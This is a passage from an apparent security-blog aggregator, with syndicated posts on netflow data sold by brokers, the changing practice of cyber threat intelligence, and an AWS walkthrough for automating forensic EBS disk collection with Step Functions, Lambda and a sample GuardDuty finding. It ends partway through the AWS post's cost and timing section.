This is what we call the security achievement gap, and closing it raises some important questions. How can organizations bring on the best people when competition for talent is so high? What if your current budget simply doesn’t allow for the number of team members you really need to monitor your network against threats?

Cyber threats are becoming more frequent, network infrastructures are growing more complex — and unlike used cars, the surge in demand for cybersecurity know-how isn’t likely to let up any time soon. The time is now for organizations to ensure their cybersecurity teams have the skills, resources, and tools they need to think and act just as innovatively as other areas of the business.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Surveillance of the Internet Backbone

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2021/08/surveillance-of-the-internet-backbone.html

Vice has an article about how data brokers sell access to the Internet backbone. This is netflow data. It’s useful for cybersecurity forensics, but can also be used for things like tracing VPN activity.

At a high level, netflow data creates a picture of traffic flow and volume across a network. It can show which server communicated with another, information that may ordinarily only be available to the server owner or the ISP carrying the traffic. Crucially, this data can be used for, among other things, tracking traffic through virtual private networks, which are used to mask where someone is connecting to a server from, and by extension, their approximate physical location.

In the hands of some governments, that could be dangerous.

[R]Evolution of the Cyber Threat Intelligence Practice

Post Syndicated from Alon Arvatz original https://blog.rapid7.com/2021/08/25/r-evolution-of-the-cyber-threat-intelligence-practice/

[R]Evolution of the Cyber Threat Intelligence Practice

The cyber threat intelligence (CTI) space is one of the most rapidly evolving areas in cybersecurity. Not only are technology and products being constantly updated and evolved, but also methodologies and concepts. One of the key changes happening in the last few years is the transition from threat intelligence as a separate pillar — which disseminates threat reports to the security organization — to threat intelligence as a central hub that feeds all the functions in the security organization with knowledge and information on the most prioritized threats. This change requires a shift in both mindset and methodology.

Traditionally, CTI has been considered a standalone practice within the security organization. Whether the security organization has dedicated personnel or not, it has been a separate practice that produces reports about various threats to the organization — essentially, looking at the threat landscape and making the same threat data accessible to all the functions in the security organization.

Traditional CTI model

[R]Evolution of the Cyber Threat Intelligence Practice
A traditional model of the CISO and the different functions in their security organization

The latest developments in threat intelligence methodologies are disrupting this concept. Effectively, threat intelligence is no longer a separate pillar, but something that should be ingested and considered in every security device, process, and decision-making event. Thus, the mission of the threat intelligence practitioner is no longer to simply create “threat reports,” but also to make sure that every part of the security organization effectively leverages threat intelligence as part of its day-to-day mission of detection, response, and overall risk management.

The evolution of threat intelligence is supported by the following primary trends in the cybersecurity space:

  1. Automation — Due to a lack of trained human resources, organizations are implementing more automation into their security operations. Supported by adoption of SOAR technologies, machine-to-machine communication is becoming much easier and more mainstream. Automation allows for pulling data from your CTI tools and constantly feeding it into various security devices and security processes, without human intervention. Essentially, supporting seamless and near-real-time integration of CTI into various security devices, as well as automated decision-making processes.
  2. Expanded access to threat intelligence — Threat intelligence vendors are investing a lot more in solutions that democratize threat intelligence and make it easy for various security practitioners to consume — for example, native applications for Security Information and Event Management (SIEM) to correlate threat data against internal logs, or browser extensions that inject threat context and risk analysis into the browser. Previously, you had lots of threat data that needed manual labor to review and take action; today, you have actionable insights that are seamlessly integrated into your security devices.

Updated CTI model

[R]Evolution of the Cyber Threat Intelligence Practice
Today’s new model of the CISO and the role of threat intelligence in supporting the different functions in their organization

The new mission of the CTI practitioner

The new mission of the CTI practitioner is to tailor threat intelligence to every function in the security organization and make it an integral part of the function’s operations. This new approach requires them to not only update their mission, but also to gain new soft skills that allow them to collaborate with other functions in the security organization.

The CTI practitioner’s newly expanded mindset and skill set would include:

  1. Developing close relationships with various stakeholders — It’s not enough to send threat reports if the internal client doesn’t know how to consume them. What looks simple for a CTI specialist is not necessarily simple to other security practitioners. Thus, in order to achieve the CTI mission, it’s important to develop close relationships with various stakeholders so that the CTI specialist can better understand their pain points and requirements, as well as tailor the best solution for them to consume. This activity serves as a platform to raise their awareness of CTI’s value, thereby helping them come up with and commit to new processes that include CTI as part of their day-to-day.
  2. Having solid knowledge of the company strategy and operations — The key to a successful CTI program is relevancy; without relevancy, you’re left with lots of unactionable threat data. Relevancy is twice as important when you want to incorporate CTI into various functions within the organization. Relevant CTI can only be achieved when the company business, organizational chart, and strategy are clear. This clarity enables the CTI practitioner to realize what intelligence is relevant to each function and tailor it to the needs of each function.
  3. Deep understanding of the company tech stack — The CTI role doesn’t require only business understanding, but also deep technical understanding of the IT infrastructure and architecture. This knowledge will allow the CTI specialist to tailor the intelligence to the risks imposed on the company tech stack, and it will support building a plan to correlate internal logs against external threat intelligence.

Following are a few examples of processes the threat intelligence team needs to implement in order to tailor threat intelligence to other security functions and make it an integral part of their operations:

  1. Third-party breach monitoring — With the understanding that the weakest link might be your third party, there’s an increasing importance of timely detection of third-party breaches. CTI monitoring supports early detection of those cases and is followed by the IR team minimizing the risk. An example of this is monitoring ransomware gangs’ leak sites for any data belonging to your company that has been leaked from any third party.
  2. SOC incident triage — One of the main missions of the Security Operations Center (SOC) is to identify cyber incidents and make a quick decision on mitigation steps. This can be tremendously improved through threat intelligence information to triage the indicators (e.g., domains and IP addresses) of each event. Threat intelligence is the key to an effective and efficient triage of these events. This can be easily achieved through a threat intelligence browser extension that triages the IOCs while browsing in the SIEM.
  3. Vulnerability prioritization process — The traditional vulnerability prioritization process relies on the CVSS score and the criticality of the vulnerable assets. This focuses the prioritization efforts on the impact of an exploitation of the vulnerabilities and gives very little focus on the probability that these vulnerabilities will be exploited. Hacker chatter from the Dark Web and security researchers’ publications can help provide a good understanding of the probability that a certain vulnerability will actually be leveraged by a threat actor to launch a cyberattack. This probability factor is an essential missing piece in the vulnerability prioritization process.
  4. Trends analysis — The CTI practitioner has access to a variety of sources, allowing them to monitor trends in the cybersecurity domain, their specific industry, or in the data held in the company. This should be provided to leadership (not only security leadership) in order to allow smart, agile decision-making on existing risks.
  5. Threat intel and cybersecurity knowledge sharing — As with “traditional” intelligence, knowledge sharing can be a major force multiplier in cyber intelligence, too. Threat intel teams should aim to create as much external cooperation with other security teams — especially from the industry they work in — as they can. This will allow the team and the security organization to better understand the risks posed to the industry and, accordingly, their company. This information will also allow the CISO better visibility into the threat landscape that’s relevant to the company.

A valuable proposition

While the evolving CTI model is making threat intelligence implementation a bit more complex, as it includes collaboration with different functions, it makes the threat intelligence itself far more valuable and impactful than ever before. The future of cyber threat intelligence is getting a lot more exciting!

How to automate forensic disk collection in AWS

Post Syndicated from Matt Duda original https://aws.amazon.com/blogs/security/how-to-automate-forensic-disk-collection-in-aws/

In this blog post you’ll learn about a hands-on solution you can use for automated disk collection across multiple AWS accounts. This solution will help your incident response team set up an automation workflow to capture the disk evidence they need to analyze to determine scope and impact of potential security incidents. This post includes AWS CloudFormation templates and all of the required AWS Lambda functions, so you can deploy this solution in your own environment. This post focuses primarily on two sources as the origination of the evidence collection workflow: AWS Security Hub and Amazon GuardDuty.

Why is automating forensic disk collection important?

AWS offers unique scaling capabilities in our compute environments. As you begin to increase your number of compute instances across multiple AWS accounts or organizations, you will find operational aspects of your business that must also scale. One of these critical operational tasks is the ability to quickly gather forensically sound disk and memory evidence during a security event.

During a security event, your incident response (IR) team must be able to collect and analyze evidence quickly while maintaining accuracy for the time period surrounding the event. It is both challenging and time consuming for the IR team to manually collect all of the relevant evidence in a cloud environment, across a large number of instances and accounts. Additionally, manual collection requires time that could otherwise be spent analyzing and responding to an event. Every role assumption, every console click, and every manual trigger required by the IR team, adds time for an attacker to continue to work through systems to meet their objectives.

Indicators of compromise (IoCs) are pieces of data that IR teams often use to identify potential suspicious activity within networks that might need further investigation. These IoCs can include file hashes, domains, IP addresses, or user agent strings. IoCs are used by services such as GuardDuty to help you discover potentially malicious activity in your accounts. For example, when you are alerted that an Amazon Elastic Compute Cloud (Amazon EC2) instance contains one or more IoCs, your IR team must gather a point-in-time copy of relevant forensic data to determine the root cause, and evaluate the likelihood that the finding requires action. This process involves gathering snapshots of any and all attached volumes, a live dump of the system’s memory, a capture of the instance metadata, and any logs that relate to the instance. These sources help your IR team to identify next steps and work towards a root cause.

It is important to take a point-in-time snapshot of an instance as close in time to the incident as possible. If there is a delay in capturing the snapshot, it can alter or make evidence unusable because the data has changed or been deleted. To take this snapshot quickly, you need a way to automate the collection and delivery of potentially hundreds of disk images while ensuring each snapshot is collected in the same way and without creating a bottleneck in the pipeline that could reduce the integrity of the evidence. In this blog post, I explain the details of the automated disk collection workflow, and explain why you might make different design decisions. You can download the solutions in CloudFormation, so that you can deploy this solution and get started on your own forensic automation workflows.

AWS Security Hub provides an aggregated view of security findings across AWS accounts, including findings produced by GuardDuty, when enabled. Security Hub also provides you with the ability to ingest custom or third-party findings, which makes it an excellent starting place for automation. This blog post uses EC2 GuardDuty findings collected into Security Hub as the example, but you can also use the same process to include custom detection events, or alerts from partner solutions such as CrowdStrike, McAfee, Sophos, Symantec, or others.

Infrastructure overview

The workflow described in this post automates the tasks that an IR team commonly takes during the course of an investigation.

Overview of disk collection workflow

The high-level disk collection workflow steps are as follows:

  1. Create a snapshot of each Amazon Elastic Block Store (Amazon EBS) volume attached to suspected instances.
  2. Create a folder in the Amazon Simple Storage Service (Amazon S3) evidence bucket with the original event data.
  3. Launch one Amazon EC2 instance per EBS volume, to be used in streaming a bit-for-bit copy of the EBS snapshot volume. These EC2 instances are launched without SSH key pairs, to help prevent any unintentional evidence corruption and to ensure consistent processing without user interaction. The EC2 instances use third-party tools dc3dd and incrond to trigger and process volumes.
  4. Write all logs from the workflow and instances to Amazon CloudWatch Logs log groups, for audit purposes.
  5. Include all EBS volumes in the S3 evidence bucket as raw image files (.dd), with the metadata from the automated capture process, as well as hashes for validation and verification.

Overview of AWS services used in the workflow

Another way of looking at this high-level workflow is from the service perspective, as shown in Figure 1.

Figure 1: Service workflow for forensic disk collection

Figure 1: Service workflow for forensic disk collection

The workflow in Figure 1 shows the following steps:

  1. A GuardDuty finding is triggered for an instance in a monitored account. This example focuses on a GuardDuty finding, but the initial detection source can also be a custom event, or an event from a third party.
  2. The Security Hub service in the monitored account receives the GuardDuty finding, and forwards it to the Security Hub service in the security account.
  3. The Security Hub service in the security account receives the monitored account’s finding.
  4. The Security Hub service creates an event over Amazon EventBridge for the GuardDuty findings, which is then caught by an EventBridge rule to forward to the DiskForensicsInvoke Lambda function. The following is the example event rule, which is included in the deployment. This example can be expanded or reduced to fit your use-case. By default, the example is set to disabled in CloudFormation. When you are ready to use the automation, you will need to enable it.
    {
      "detail-type": [
        "Security Hub Findings - Imported"
      ],
      "source": [
        "aws.securityhub"
      ],
      "detail": {
        "findings": {
          "ProductFields": {
            "aws/securityhub/SeverityLabel": [
              "CRITICAL",
              "HIGH",
              "MEDIUM"
            ],
            "aws/securityhub/ProductName": [
              "GuardDuty"
            ]
          }
        }
      }
    }
    

  5. The DiskForensicsInvoke Lambda function receives the event from EventBridge, formats the event, and provides the formatted event as input to AWS Step Functions workflow.
  6. The DiskForensicStepFunction workflow includes ten Lambda functions, from initial snapshot to streaming the evidence to the S3 bucket. After the Step Functions workflow enters the CopySnapshot state, it converts to a map state. This allows the workflow to have one thread per volume submitted, and ensures that each volume will be placed in the evidence bucket as quickly as possible without needing to wait for other steps to complete.
    Figure 2: Forensic disk collection Step Function workflow

    Figure 2: Forensic disk collection Step Function workflow

    As shown in Figure 2, the following are the embedded Lambda functions in the DiskForensicStepFunction workflow:

    1. CreateSnapshot – This function creates the initial snapshots for each EBS volume attached to the instance in question. It also records instance metadata that is included with the snapshot data for each EBS volume.
      Required Environmental Variables: ROLE_NAME, EVIDENCE_BUCKET, LOG_GROUP
    2. CheckSnapshot – This function checks to see if the snapshots from the previous step are completed. If not, the function retries with an exponential backoff.
      Required Environmental Variable: ROLE_NAME
    3. CopySnapshot – This function copies the initial snapshot and ensures that it is using the forensics AWS Key Management Service (AWS KMS) key. This key is stored in the security account and will be used throughout the remainder of the process.
      Required Environmental Variables: ROLE_NAME, KMS_KEY
    4. CheckCopySnapshot – This function checks to see if the snapshot from the previous step is completed. If not, the function retries with exponential backoff.
      Required Environmental Variable: ROLE_NAME
    5. ShareSnapshot – This function takes the copied snapshot using the forensics KMS key, and shares it with the security account.
      Required Environmental Variables: ROLE_NAME, SECURITY_ACCOUNT
    6. FinalCopySnapshot – This function copies the shared snapshot into the security account, as the original shared snapshot is still owned by the monitored account. This ensures that a copy is available, in case it has to be referenced for additional processing later.
      Required Environmental Variable: KMS_KEY
    7. FinalCheckSnapshot – This function checks to see if the snapshot from the previous step is completed. If not, the function fails and it retries with an exponential backoff.
    8. CreateVolume – This function creates an EBS Magnetic volume from the snapshot in the previous step. These volumes created use magnetic disks, because they are required for consistent hash results from the dc3dd process. This volume cannot use a solid state drive (SSD), because the hash would be different each time. If the EBS Magnetic volume size is greater than or equal to 500GB, then Amazon EBS switches from using standard EBS Magnetic volumes to Throughput Optimized HDD (st1) volumes.
      Required Environmental Variables: KMS_KEY, SUPPORTED_AZS
    9. RunInstance – This function launches one EC2 instance per volume, to be used in streaming the volume to the S3 bucket. The AMI passed by the environmental variable needs to be created using the provided Amazon EC2 Image Builder pipeline before deploying the environment. This function also passes some user data to the instance, artifact bucket, source volume name, and the incidentID. This information is used by the instance when placing the evidence into the S3 bucket.
      Required Environmental Variables: AMI_ID, INSTANCE_PROFILE_NAME, VPC_ID, SECURITY_GROUP
    10. CreateInstanceWait – This function creates a 30-second wait, to allow the instance some additional time to spin up.
    11. MountForensicVolume – This function checks the CloudWatch log group ForensicDiskReadiness, to see that the incrond service is running on the instance. If the incrond service is running, the function attaches the volume to the instance and then writes the final logs to the S3 bucket and CloudWatch Logs.
      Required Environmental Variable: LOG_GROUP
  7. The instance that is created has pre-built tools and scripts on it from the template below using Image Builder. This instance uses the incrond tool to monitor /dev/disk/by-label for new devices being attached to the instance. After the MountForensicVolume Lambda function attaches the volume to the instance, a file is created in the /dev/disk/by-label directory for the attached volume. The incrond daemon starts the orchestrator script, which calls the collector script. The collector script uses the dc3dd tool to stream the bit-for-bit copy of the volume to S3. After the copy has completed, the image shuts down and is terminated. All logs from the process are sent to the S3 bucket and CloudWatch Logs.

The solution provided in the post includes the CloudFormation templates you need to get started, except for creation the initial EventBridge rule (which is provided in step 4 of the previous section). The solution includes an isolated VPC, subnets, security groups, roles, and more. The VPC provided does not provide any egress through an internet gateway or NAT gateway, and that is the recommended solution. The only connectivity provided is through the S3 gateway VPC endpoint and the CloudWatch Logs interface VPC endpoint (also deployed in the template).

Deploy the CloudFormation templates

To implement the solution outlined in this post, you need to deploy three separate AWS CloudFormation templates in the order described in this section.

diskForensicImageBuilder (security account)

First, you deploy diskForensicImageBuilder in the security account. This template contains the resources and AMIs needed to create and run the Image Builder pipeline that is required to build the collector VM. This pipeline installs the required binaries, and scripts, and updates the system.

Note: diskForensicImageBuilder is configured to use the default VPC and security group. If you have added restrictions or deleted your default VPC, you will need to modify the template.

To deploy the diskForensicImageBuilder template

  1. To open the AWS CloudFormation console pre-loaded with the template, choose the following Launch Stack button.
    Select the Launch Stack button to launch the template
  2. In the AWS CloudFormation console, on the Specify Details page, enter a name for the stack.
  3. Leave all default settings in place, and choose Next to configure the stack options.
  4. Choose Next to review and scroll to the bottom of the page. Select the check box under the Capabilities section, next to of the acknowledgement:
    • I acknowledge that AWS CloudFormation might create IAM resources with custom names.
  5. Choose Create Stack.
  6. After the Image Builder pipeline has been created, on the Image pipelines page, choose Actions and select Run pipeline to manually run the pipeline to create the base AMI.

    Figure 3: Run the new Image Builder pipeline

    Figure 3: Run the new Image Builder pipeline

diskForensics (security account)

Second, you deploy diskForensics in the security account. This is a nested CloudFormation stack containing four CloudFormation templates. The four CloudFormation templates are as follows:

  1. forensicResources – This stack holds all of the foundation for the solution, including the VPC and networking components, the S3 evidence bucket, CloudWatch log groups, and collectorVM instance profile.

    Figure 4: Forensics VPC

    Figure 4: Forensics VPC

  2. forensicFunctions – This stack contains all of the Lambda functions referenced in the Step Functions workflow as well as the role used by the Lambda functions.
  3. forensicStepFunction – This stack contains the Step Functions code, the role used by the Step Functions service, and the CloudWatch log group used by the service. It also contains an Amazon Simple Notification Service (SNS) topic used to alert on pipeline failure.
  4. forensicStepFunctionInvoke – This stack contains the DiskForensicsInvoke Lambda function and the role used by that Lambda function that allows it to call the Step Function workflow.

Note: You need to have the following required variables to continue:

  • ArtifactBucketName
  • ORGID
  • ForensicsAMI

If your accounts are not using AWS Organizations, you can use a dummy string for now. It adds a condition statement to the forensics KMS key that you can update or remove later.

To deploy the diskForensics stack

  1. To open the AWS CloudFormation console pre-loaded with the template, choose the following Launch Stack button.
    Select the Launch Stack button to launch the template
  2. In the AWS CloudFormation console, on the Specify Details page, enter a name for the stack.
  3. For the ORGID field, enter the AWS Organizations ID.

    Note: If you are not using AWS organizations, leave the default string. If you are deploying as multi-account without AWS Organizations, you will need to update the KMS key policy to remove the principalOrgID condition statements, and add the correct principals.

  4. For the ArtifactBucketName field, enter the S3 bucket name you would like to use for your forensic artifacts.

    Important: The ArtifactBucketName must be a globally unique name.

  5. For the ForensicsAMI field, enter the AMI ID for the image that was created by Image Builder.
  6. For the example in this post, leave the default values for all other fields. Customizing these fields allows you to customize this code example for your own purposes.
  7. Choose Next to configure the stack options and leave all default settings in place.
  8. Choose Next to review and scroll to the bottom of the page. Select the two check boxes under the Capabilities section, next to each of the acknowledgements:
    • I acknowledge that AWS CloudFormation might create IAM resources with custom names.
    • I acknowledge that AWS CloudFormation might require the following capability: CAPABILITY_AUTO_EXPAND.
  9. Choose Create Stack.
  10. After the stack has completed provisioning, subscribe to the Amazon SNS topic to receive pipeline alerts.

diskMember (each monitored account)

Third, you deploy diskMember in each monitored account. This stack contains the role and policy that the automation workflow needs to assume, so that it can create the initial snapshots and share the snapshot with the security account. If you are deploying this solution in a single account, you deploy diskMember in the security account.

Important: Ensure that all KMS keys that could be used to encrypt EBS volumes in each monitored account grant this role the ability to CreateGrant, Encrypt, Decrypt, ReEncrypt*, GenerateDataKey*, and Describe key. The default policy grants the permissions in AWS Identity and Access Management (IAM), but any restrictive resource policies could block the ability to create the initial snapshot and decrypt the snapshot when making the copy.

To deploy the diskMember stack

  1. To open the AWS CloudFormation console pre-loaded with the template, choose the following Launch Stack button.
    Select the Launch Stack button to launch the template
    If deploying across multiple accounts, consider using AWS CloudFormation StackSets for simplified multi-account deployment.
  2. In the AWS CloudFormation console, on the Specify Details page, enter a name for the stack.
  3. For the MasterAccountNum field, enter the account number for your security administrator account.
  4. Choose Next to configure the stack options and leave all default settings in place.
  5. Choose Next to review and scroll to the bottom of the page. Select the check box under the Capabilities section, next to the acknowledgement:
    • I acknowledge that AWS CloudFormation might create IAM resources with custom names.
  6. Choose Create Stack.

Test the solution

Next, you can try this solution with an event sample to start the workflow.

To initiate a test run

  1. Copy the following example GuardDuty event. The example uses the AWS Region us-east-1, but you can update the example to use another Region. Be sure to replace the account ID 0123456789012 with the account number of your monitored account, and replace the instance ID i-99999999 with the instance ID you would like to capture.
    {
      “SchemaVersion”: “2018-10-08”,
      “Id”: “arn:aws:guardduty:us-east-1:0123456789012:detector/f2b82a2b2d8d8541b8c6d2c7d9148e14/finding/b0baa737c3bf7309db2a396651fdb500”,
      “ProductArn”: “arn:aws:securityhub:us-east-1::product/aws/guardduty”,
      “GeneratorId”: “arn:aws:guardduty:us-east-1:0123456789012:detector/f2b82a2b2d8d8541b8c6d2c7d9148e14”,
      “AwsAccountId”: “0123456789012”,
      “Types”: [
        “Effects/Resource Consumption/UnauthorizedAccess:EC2-TorClient”
      ],
      “FirstObservedAt”: “2020-10-22T03:52:13.438Z”,
      “LastObservedAt”: “2020-10-22T03:52:13.438Z”,
      “CreatedAt”: “2020-10-22T03:52:13.438Z”,
      “UpdatedAt”: “2020-10-22T03:52:13.438Z”,
      “Severity”: {
        “Product”: 8,
        “Label”: “HIGH”,
        “Normalized”: 60
      },
      “Title”: “EC2 instance i-99999999 is communicating with Tor Entry node.”,
      “Description”: “EC2 instance i-99999999 is communicating with IP address 198.51.100.0 on the Tor Anonymizing Proxy network marked as an Entry node.”,
      “SourceUrl”: “https://us-east-1.console.aws.amazon.com/guardduty/home?region=us-east-1#/findings?macros=current&fId=b0baa737c3bf7309db2a396651fdb500”,
      “ProductFields”: {
        “aws/guardduty/service/action/networkConnectionAction/remotePortDetails/portName”: “HTTP”,
        “aws/guardduty/service/archived”: “false”,
        “aws/guardduty/service/action/networkConnectionAction/remoteIpDetails/organization/asnOrg”: “GeneratedFindingASNOrg”,
        “aws/guardduty/service/action/networkConnectionAction/remoteIpDetails/Geolocation/lat”: “0”,
        “aws/guardduty/service/action/networkConnectionAction/remoteIpDetails/ipAddressV4”: “198.51.100.0”,
        “aws/guardduty/service/action/networkConnectionAction/remoteIpDetails/Geolocation/lon”: “0”,
        “aws/guardduty/service/action/networkConnectionAction/blocked”: “false”,
        “aws/guardduty/service/action/networkConnectionAction/remotePortDetails/port”: “80”,
        “aws/guardduty/service/action/networkConnectionAction/remoteIpDetails/country/countryName”: “GeneratedFindingCountryName”,
        “aws/guardduty/service/serviceName”: “guardduty”,
        “aws/guardduty/service/action/networkConnectionAction/localIpDetails/ipAddressV4”: “10.0.0.23”,
        “aws/guardduty/service/detectorId”: “f2b82a2b2d8d8541b8c6d2c7d9148e14”,
        “aws/guardduty/service/action/networkConnectionAction/remoteIpDetails/organization/org”: “GeneratedFindingORG”,
        “aws/guardduty/service/action/networkConnectionAction/connectionDirection”: “OUTBOUND”,
        “aws/guardduty/service/eventFirstSeen”: “2020-10-22T03:52:13.438Z”,
        “aws/guardduty/service/eventLastSeen”: “2020-10-22T03:52:13.438Z”,
        “aws/guardduty/service/evidence/threatIntelligenceDetails.0_/threatListName”: “GeneratedFindingThreatListName”,
        “aws/guardduty/service/action/networkConnectionAction/localPortDetails/portName”: “Unknown”,
        “aws/guardduty/service/action/actionType”: “NETWORK_CONNECTION”,
        “aws/guardduty/service/action/networkConnectionAction/remoteIpDetails/city/cityName”: “GeneratedFindingCityName”,
        “aws/guardduty/service/resourceRole”: “TARGET”,
        “aws/guardduty/service/action/networkConnectionAction/localPortDetails/port”: “39677”,
        “aws/guardduty/service/action/networkConnectionAction/protocol”: “TCP”,
        “aws/guardduty/service/count”: “1”,
        “aws/guardduty/service/additionalInfo/sample”: “true”,
        “aws/guardduty/service/action/networkConnectionAction/remoteIpDetails/organization/asn”: “-1”,
        “aws/guardduty/service/action/networkConnectionAction/remoteIpDetails/organization/isp”: “GeneratedFindingISP”,
        “aws/guardduty/service/evidence/threatIntelligenceDetails.0_/threatNames.0_”: “GeneratedFindingThreatName”,
        “aws/securityhub/FindingId”: “arn:aws:securityhub:us-east-1::product/aws/guardduty/arn:aws:guardduty:us-east-1:0123456789012:detector/f2b82a2b2d8d8541b8c6d2c7d9148e14/finding/b0baa737c3bf7309db2a396651fdb500”,
        “aws/securityhub/ProductName”: “GuardDuty”,
        “aws/securityhub/CompanyName”: “Amazon”
      },
      “Resources”: [
        {
          “Type”: “AwsEc2Instance”,
          “Id”: “arn:aws:ec2:us-east-1:0123456789012:instance/i-99999999”,
          “Partition”: “aws”,
          “Region”: “us-east-1”,
          “Tags”: {
            “GeneratedFindingInstaceTag7”: “GeneratedFindingInstaceTagValue7”,
            “GeneratedFindingInstaceTag8”: “GeneratedFindingInstaceTagValue8”,
            “GeneratedFindingInstaceTag9”: “GeneratedFindingInstaceTagValue9”,
            “GeneratedFindingInstaceTag1”: “GeneratedFindingInstaceValue1”,
            “GeneratedFindingInstaceTag2”: “GeneratedFindingInstaceTagValue2”,
            “GeneratedFindingInstaceTag3”: “GeneratedFindingInstaceTagValue3”,
            “GeneratedFindingInstaceTag4”: “GeneratedFindingInstaceTagValue4”,
            “GeneratedFindingInstaceTag5”: “GeneratedFindingInstaceTagValue5”,
            “GeneratedFindingInstaceTag6”: “GeneratedFindingInstaceTagValue6”
          },
          “Details”: {
            “AwsEc2Instance”: {
              “Type”: “m3.xlarge”,
              “ImageId”: “ami-99999999”,
              “IpV4Addresses”: [
                “10.0.0.1”,
                “198.51.100.0”
              ],
              “IamInstanceProfileArn”: “arn:aws:iam::0123456789012:example/instance/profile”,
              “VpcId”: “GeneratedFindingVPCId”,
              “SubnetId”: “GeneratedFindingSubnetId”,
              “LaunchedAt”: “2016-08-02T02:05:06Z”
            }
          }
        }
      ],
      “WorkflowState”: “NEW”,
      “Workflow”: {
        “Status”: “NEW”
      },
      “RecordState”: “ACTIVE”
    }
    

  2. Navigate to the DiskForensicsInvoke Lambda function and add the GuardDuty event as a test event.
  3. Choose Test. You should see a success for the invocation.
  4. Navigate to the Step Functions workflow to monitor its progress. When the instances have terminated, all of the artifacts should be in the S3 bucket with additional logs in CloudWatch Logs.

Expected outputs

The forensic disk collection pipeline maintains logs of the actions throughout the process, and uploads the final artifacts to the S3 artifact bucket and CloudWatch Logs. This enables security teams to send forensic collection logs to log aggregation tools or service management tools for additional integrations. The expected outputs of the solution are detailed in the following sections, organized by destination.

S3 artifact outputs

The S3 artifact bucket is the final destination for all logs and the raw disk images. For each security incident that triggers the Step Functions workflow, a new folder will be created with the name of the IncidentID. Included in this folder will be the JSON file that triggered the capture operation, the image (dd) files for the volumes, the capture log, and the resources associated with the capture operation, as shown in Figure 5.

Figure 5: Forensic artifacts in the S3 bucket

Figure 5: Forensic artifacts in the S3 bucket

Forensic Disk Audit log group

The Forensic Disk Audit CloudWatch log group contains a log of where the Step Functions workflow was after creating the initial snapshots in the CreateSnapshot Lambda function. This includes the high-level finding information, as well as the metadata for each snapshot. Also included in this log group is the completed data around each completed disk collection operation, including all associated resources and the location of the forensic evidence in the S3 bucket. The following event is an example log demonstrating a completed capture. Notice all of the metadata provided under captured snapshots. Be sure to update the example to use the correct AWS Region. Replace the account ID 0123456789012 with the account number of your monitored account, and replace the instance ID i-99999999 with the instance ID you would like to capture.

{
  "AwsAccountId": "0123456789012",
  "Types": [
    "Effects/Resource Consumption/UnauthorizedAccess:EC2-TorClient"
  ],
  "FirstObservedAt": "2020-10-22T03:52:13.438Z",
  "LastObservedAt": "2020-10-22T03:52:13.438Z",
  "CreatedAt": "2020-10-22T03:52:13.438Z",
  "UpdatedAt": "2020-10-22T03:52:13.438Z",
  "Severity": {
    "Product": 8,
    "Label": "HIGH",
    "Normalized": 60
  },
  "Title": "EC2 instance i-99999999 is communicating with Tor Entry node.",
  "Description": "EC2 instance i-99999999 is communicating with IP address 198.51.100.0 on the Tor Anonymizing Proxy network marked as an Entry node.",
  "FindingId": "arn:aws:securityhub:us-east-1::product/aws/guardduty/arn:aws:guardduty:us-east-1:0123456789012:detector/f2b82a2b2d8d8541b8c6d2c7d9148e14/finding/b0baa737c3bf7309db2a396651fdb500",
  "Resource": {
    "Type": "AwsEc2Instance",
    "Arn": "arn:aws:ec2:us-east-1:0123456789012:instance/i-99999999",
    "Id": "i-99999999",
    "Partition": "aws",
    "Region": "us-east-1",
    "Details": {
      "AwsEc2Instance": {
        "Type": "m3.xlarge",
        "ImageId": "ami-99999999",
        "IpV4Addresses": [
          "10.0.0.1",
          "198.51.100.0"
        ],
        "IamInstanceProfileArn": "arn:aws:iam::0123456789012:example/instance/profile",
        "VpcId": "GeneratedFindingVPCId",
        "SubnetId": "GeneratedFindingSubnetId",
        "LaunchedAt": "2016-08-02T02:05:06Z"
      }
    }
  },
  "EvidenceBucket": "forensic-artifact-bucket",
  "IncidentID": "b0baa737c3bf7309db2a396651fdb500",
  "CapturedSnapshots": [
    {
      "SourceSnapshotID": "snap-99999999",
      "SourceVolumeID": "vol-99999999",
      "SourceDeviceName": "/dev/xvda",
      "VolumeSize": 100,
      "InstanceID": "i-99999999",
      "FindingID": "arn:aws:securityhub:us-east-1::product/aws/guardduty/arn:aws:guardduty:us-east-1:0123456789012:detector/f2b82a2b2d8d8541b8c6d2c7d9148e14/finding/b0baa737c3bf7309db2a396651fdb500",
      "IncidentID": "b0baa737c3bf7309db2a396651fdb500",
      "AccountID": "0123456789012",
      "Region": "us-east-1",
      "EvidenceBucket": "forensic-artifact-bucket"
    }
  ]
}
{
  "SourceSnapshotID": "snap-99999999",
  "SourceVolumeID": "vol-99999999",
  "SourceDeviceName": "/dev/sdd",
  "VolumeSize": 100,
  "InstanceID": "i-99999999",
  "FindingID": "arn:aws:securityhub:us-east-1::product/aws/guardduty/arn:aws:guardduty:us-east-1:0123456789012:detector/f2b82a2b2d8d8541b8c6d2c7d9148e14/finding/b0baa737c3bf7309db2a396651fdb500",
  "IncidentID": "b0baa737c3bf7309db2a396651fdb500",
  "AccountID": "0123456789012",
  "Region": "us-east-1",
  "EvidenceBucket": "forensic-artifact-bucket",
  "CopiedSnapshotID": "snap-99999998",
  "EncryptionKey": "arn:aws:kms:us-east-1:0123456789012:key/e793cbd3-ce6a-4b17-a48f-7e78984346f2",
  "FinalCopiedSnapshotID": "snap-99999997",
  "ForensicVolumeID": "vol-99999998",
  "VolumeAZ": "us-east-1a",
  "ForensicInstances": [
    "i-99999998"
  ],
  "DiskImageLocation": "s3://forensic-artifact-bucket/b0baa737c3bf7309db2a396651fdb500/disk_evidence/vol-99999999.image.dd"
}

Forensic Disk Capture log group

The Forensic Disk Capture CloudWatch log group contains the logs from the EC2Collector VM. These logs detail the operations taken by the instance, which include when the dc3dd command was executed, what the transfer speed was to the S3 bucket, what the hash of the volume was, and how long the total operation took to complete. The log example in Figure 6 shows the output of the disk capture on the collector instance.

Figure 6: Forensic Disk Capture logs

Figure 6: Forensic Disk Capture logs

Cost and capture times

This solution may save you money over a traditional system that requires bastion hosts (jump boxes) and forensic instances to be readily available. With AWS, you pay only for the individual services you need, for as long as you use them. The cost of this solution is minimal, because charges are only incurred based on the logs or artifacts that you store in CloudWatch or Amazon S3, and the invocation of the Step Functions workflow. Additionally, resources such as the collectorVM are only created and used when needed.

This solution can also save you time. If an analyst was manually working through this workflow, it could take significantly more time than the automated solution. The following are some examples of collection times. You can see that even when the manual workflow time increases, the automated workflow time stays the same, because of how the solution scales.

Scenario 1: EC2 instance with one 8GB volume

